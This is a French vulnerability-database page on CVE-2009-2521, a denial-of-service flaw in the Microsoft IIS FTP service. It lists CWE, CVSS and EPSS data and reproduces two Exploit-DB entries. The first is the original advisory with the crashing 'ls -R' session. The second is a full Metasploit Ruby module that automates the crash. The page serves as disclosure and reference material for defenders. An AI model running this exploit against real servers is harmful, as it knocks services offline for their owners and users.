CPE, qui signifie Common Platform Enumeration, est un système normalisé de dénomination du matériel, des logiciels et des systèmes d'exploitation. CPE fournit un schéma de dénomination structuré pour identifier et classer de manière unique les systèmes informatiques, les plates-formes et les progiciels sur la base de certains attributs tels que le fournisseur, le nom du produit, la version, la mise à jour, l'édition et la langue.
CWE, ou Common Weakness Enumeration, est une liste complète et une catégorisation des faiblesses et des vulnérabilités des logiciels. Elle sert de langage commun pour décrire les faiblesses de sécurité des logiciels au niveau de l'architecture, de la conception, du code ou de la mise en œuvre, qui peuvent entraîner des vulnérabilités.
CAPEC, qui signifie Common Attack Pattern Enumeration and Classification (énumération et classification des schémas d'attaque communs), est une ressource complète, accessible au public, qui documente les schémas d'attaque communs utilisés par les adversaires dans les cyberattaques. Cette base de connaissances vise à comprendre et à articuler les vulnérabilités communes et les méthodes utilisées par les attaquants pour les exploiter.
Services & Prix
Aides & Infos
Recherche de CVE id, CWE id, CAPEC id, vendeur ou mots clés dans les CVE
Stack consumption vulnerability in the FTP Service in Microsoft Internet Information Services (IIS) 5.0 through 7.0 allows remote authenticated users to cause a denial of service (daemon crash) via a list (ls) -R command containing a wildcard that references a subdirectory, followed by a .. (dot dot), aka "IIS FTP Service DoS Vulnerability."
Uncontrolled Resource Consumption The product does not properly control the allocation and maintenance of a limited resource.
Métriques
Métriques
Score
Gravité
CVSS Vecteur
Source
V2
5
AV:N/AC:L/Au:N/C:N/I:N/A:P
nvd@nist.gov
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
70.66%
–
–
2022-07-17
–
–
65.92%
–
–
2022-07-24
–
–
70.66%
–
–
2023-03-12
–
–
–
96.95%
–
2023-03-19
–
–
–
96.8%
–
2023-04-30
–
–
–
96.9%
–
2023-06-11
–
–
–
96.98%
–
2023-07-30
–
–
–
97.06%
–
2023-10-29
–
–
–
96.97%
–
2023-11-12
–
–
–
97%
–
2023-12-10
–
–
–
97.08%
–
2024-01-28
–
–
–
97.14%
–
2024-03-10
–
–
–
97.07%
–
2024-04-14
–
–
–
97.06%
–
2024-06-02
–
–
–
97.09%
–
2024-07-07
–
–
–
96.97%
–
2024-08-11
–
–
–
96.92%
–
2024-09-22
–
–
–
96.91%
–
2024-10-27
–
–
–
96.82%
–
2024-12-08
–
–
–
96.85%
–
2024-12-22
–
–
–
93.75%
–
2025-02-09
–
–
–
93.49%
–
2025-03-16
–
–
–
94.05%
–
2025-01-19
–
–
–
93.75%
–
2025-02-16
–
–
–
93.49%
–
2025-03-18
–
–
–
–
54.87%
2025-03-30
–
–
–
–
60.78%
2025-03-30
–
–
–
–
60.78,%
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Date de publication : 2009-09-03 22h00 +00:00 Auteur : kingcope EDB Vérifié : Yes
***** MS IIS FTPD DoS ZER0DAY *****
There is a DoS vulnerability in the globbing functionality of IIS FTPD.
Anonymous users can exploit this if they have read access to a directory!!!
Normal users can exploit this too if they can read a directory.
Example session where the anonymous user has read access to the folder "pub":
C:\Users\Nikolaos>ftp 192.168.2.102
Verbindung mit 192.168.2.102 wurde hergestellt.
220 Microsoft FTP Service
Benutzer (192.168.2.102:(none)): ftp
331 Anonymous access allowed, send identity (e-mail name) as password.
Kennwort:
230 Anonymous user logged in.
ftp> ls "-R p*/../"
...
p*/../pub:
pub
...
p*/../pub:
pub
...
p*/../pub:
pub
...
p*/../pub:
pub
...
Verbindung beendet durch Remotehost. (MEANS: Remote Host has closed
the connection)
ftp>
ftp>
By looking into my debugging session with OllyDbg I see that an
exception is raised and
the ftp service crashes due to a "stack overflow", what is a stack exhaustion.
If the ftp service is set to "manual" startup in services control
manager the service
needs to be restarted manually.
IIS 5.0 and 6.0 were tested and are affected.
Best Regards,
Nikolaos Rangos
# milw0rm.com [2009-09-04]
Date de publication : 2011-07-02 22h00 +00:00 Auteur : Myo Soe EDB Vérifié : No
# Exploit Title: [MS09-053] Microsoft IIS FTP Server <= 7.0 Stack Exhaustion DoS
# Date: Jul 03, 2011
# Updated: Jul 13, 2011
# Author: Myo Soe <YGN Ethical Hacker Group - http://yehg.net/>
# Software Link: http://www.microsoft.com/
# Version: 5.0 - 7.0
# Tested on: unpatched version of windows xp & 2k3
##
# $Id: $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Ftp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft IIS FTP Server <= 7.0 LIST Stack Exhaustion Denial of Service',
'Description' => %q{
This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the "FTP Publishing" service must be configured as "manual" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.
},
'Author' => [
'Nikolaos "Kingcope" Rangos', # Bug Discoverer
'Myo Soe <YGN Ethical Hacker Group, http://yehg.net/>' # Metasploit Module
],
'License' => MSF_LICENSE,
'Version' => '$Revision: 4 $',
'References' =>
[
[ 'CVE', '2009-2521'],
[ 'BID', '36273'],
[ 'OSVDB', '57753'],
[ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],
[ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']
],
'DisclosureDate' => 'Sep 03 2009'))
register_options([
OptString.new('FTPUSER', [ true, 'Valid FTP username', 'anonymous' ]),
OptString.new('FTPPASS', [ true, 'Valid FTP password for username', 'mozilla@example.com' ])
])
end
def run
begin
return unless connect_login
print_status('Checking if there is at least one directory ...')
res = send_cmd_data(['ls'],'')
if res.to_s =~ /\<DIR\> / then
print_status('Directory found, skipped creating a directory')
else
print_status('No single directory found')
print_status('Attempting to create a directory ...')
new_dir = Rex::Text.rand_text_alphanumeric(6)
res = send_cmd(['mkd',new_dir])
if res =~ /directory created/ then
print_status("New directory \"#{new_dir}\" was created!")
else
print_error('Write-access was denied')
print_error('Exploit failed')
disconnect
return
end
end
print_status("Sending DoS packets ...")
res = send_cmd_datax(['ls','-R */../'],' ')
disconnect
rescue ::Interrupt
raise $!
rescue Errno::ECONNRESET
print_good("MS IIS FTP Server has crashed successfully.")
rescue ::Rex::ConnectionRefused
print_good("Cannot connect. The server is not running.")
end
end
# Workaround: modified send_cmd_data function with short sleep time before data_disconnect call
# Bug Tracker: 4868
def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)
args[0] = "LIST"
# Set the transfer mode and connect to the remove server
return nil if not data_connect(mode)
# Our pending command should have got a connection now.
res = send_cmd(args, true, nsock)
# make sure could open port
return nil unless res =~ /^(150|125) /
# dispatch to the proper method
begin
data = self.datasocket.get_once(-1, ftp_timeout)
rescue ::EOFError
data = nil
end
select(nil,nil,nil,1)
# close data channel so command channel updates
data_disconnect
# get status of transfer
ret = nil
ret = recv_ftp_resp(nsock)
ret = [ ret, data ]
ret
end
end
Products Mentioned
Configuraton 0
Microsoft>>Internet_information_services >> Version From (including) 5.0 To (including) 7.0
Microsoft>>Internet_information_services >> Version 5.0 (Open CPE detail)
Microsoft>>Internet_information_services >> Version 5.1 (Open CPE detail)
Microsoft>>Internet_information_services >> Version 6.0 (Open CPE detail)
Microsoft>>Internet_information_services >> Version 7.0 (Open CPE detail)